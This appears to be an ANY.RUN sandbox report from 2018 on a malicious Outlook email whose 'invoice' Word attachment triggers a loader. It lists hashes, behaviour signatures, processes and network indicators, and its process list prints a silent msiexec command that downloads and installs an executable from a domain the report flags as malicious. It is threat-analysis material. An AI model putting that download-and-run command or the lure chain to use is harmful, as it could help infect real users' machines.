analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7f43_9953_95570ebc_b0b0_4312_8d7f_05aa6e4e3721.eml (72.4 KB).msg

Full analysis: https://app.any.run/tasks/1a2edeb7-b683-469f-9bcf-e0bd42398c6b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 18:08:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

1DFA5F9C5D3B90DFC0B64ACE0263696D

SHA1:

748EBA5B54B8456530D78DAD73D68DAE62FA4E85

SHA256:

4F536333DAE6B8DF59CEEC637EFDB35F37CF7C11B362CD2949325FD6E6BF0F1D

SSDEEP:

1536:Mze1TUAeAyJB52y6IdOLY8S5GxvSt3y83D2hY2Mgmx32p:B1TIf2vIdUKt3R4Y2Dmxg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 3748)
    • Application was dropped or rewritten from another process

      • exit.exe (PID: 3448)
      • WMIsvc.exe (PID: 3356)
      • btc.exe (PID: 3580)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2156)
    • Loads dropped or rewritten executable

      • cmd.exe (PID: 1872)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 3208)
    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 3208)
      • WINWORD.EXE (PID: 3748)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 3208)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2156)
      • WMIsvc.exe (PID: 3356)
      • cmd.exe (PID: 1872)
    • Application launched itself

      • WINWORD.EXE (PID: 3748)
    • Starts CMD.EXE for commands execution

      • exit.exe (PID: 3448)
    • Creates files in the program directory

      • btc.exe (PID: 3580)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3748)
      • OUTLOOK.EXE (PID: 3208)
      • WINWORD.EXE (PID: 1088)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3748)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2156)
    • Creates a software uninstall entry

      • msiexec.exe (PID: 2156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (46.5)
.oft | Outlook Form Template (27.2)
.doc | Microsoft Word document (20.9)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
11
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start outlook.exe winword.exe no specs winword.exe no specs msiexec.exe no specs msiexec.exe wmisvc.exe exit.exe no specs cmd.exe ping.exe no specs ping.exe no specs btc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3208"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\7f43_9953_95570ebc_b0b0_4312_8d7f_05aa6e4e3721.eml (72.4 KB).msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3748"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\H8A4TNL1\invoice-07 11 2018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1088"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1552C:\Windows\System32\msiexec.exe VI=ssa EXE=DLL /q /norestart /i http://officesupportbox.com/WMIsvcC:\Windows\System32\msiexec.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2156C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3356"C:\Users\admin\AppData\Local\Temp\Data1\WMIsvc.exe"C:\Users\admin\AppData\Local\Temp\Data1\WMIsvc.exe
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3448"C:\Users\admin\AppData\Local\Temp\exit.exe" C:\Users\admin\AppData\Local\Temp\exit.exeWMIsvc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Wiskas
Exit code:
0
Version:
1.0.0.0
1872cmd /c i.cmdC:\Windows\system32\cmd.exe
exit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1992ping yandex.com -n 3 -w 6000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2540ping yandex.com -n 3 -w 6000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 907
Read events
2 986
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
6
Text files
35
Unknown types
6

Dropped files

PID
Process
Filename
Type
3208OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR9611.tmp.cvr
MD5:
SHA256:
3208OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF03BFF680E336DB9D.TMP
MD5:
SHA256:
3208OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\H8A4TNL1\invoice-07 11 2018 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
3748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD4C0.tmp.cvr
MD5:
SHA256:
3748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_1FEB8A26-705E-4DF4-8E2E-ED7A458913DC.0\A380AF55.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
1088WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_1FEB8A26-705E-4DF4-8E2E-ED7A458913DC.0\~DF373AB055A23F7561.TMP
MD5:
SHA256:
3208OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_BA4D06BD661A134FB0FB3EBDB15E6CE7.datxml
MD5:EEAA832C12F20DE6AAAA9C7B77626E72
SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16
3208OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:1BE7F1D7B045FA284D6C8BE3E82F4139
SHA256:AB6C4D150EF3B6ED82B8DD7D0A1332E29B2CE544FDD5C29D391005DBF1EF534E
3748WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:257D62B67CC30B24DD7B311D252BF8AA
SHA256:388E553D42AE92C7F718E70AA1D3E523B0247D6802229C8A5037C1DA71BDF8EA
3748WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4A53899C9316D0214DE360F42462362A
SHA256:99FFF3F4D07F6E400FA678CFAB626D7AED863D56CA61EF242FA4C79A2EB17823
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3208
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
2156
msiexec.exe
GET
200
185.244.130.88:80
http://officesupportbox.com/WMIsvc
unknown
executable
3.57 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2156
msiexec.exe
185.244.130.88:80
officesupportbox.com
malicious
3208
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
officesupportbox.com
  • 185.244.130.88
malicious
yandex.com
  • 213.180.204.62
whitelisted

Threats

PID
Process
Class
Message
2156
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
2156
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
No debug info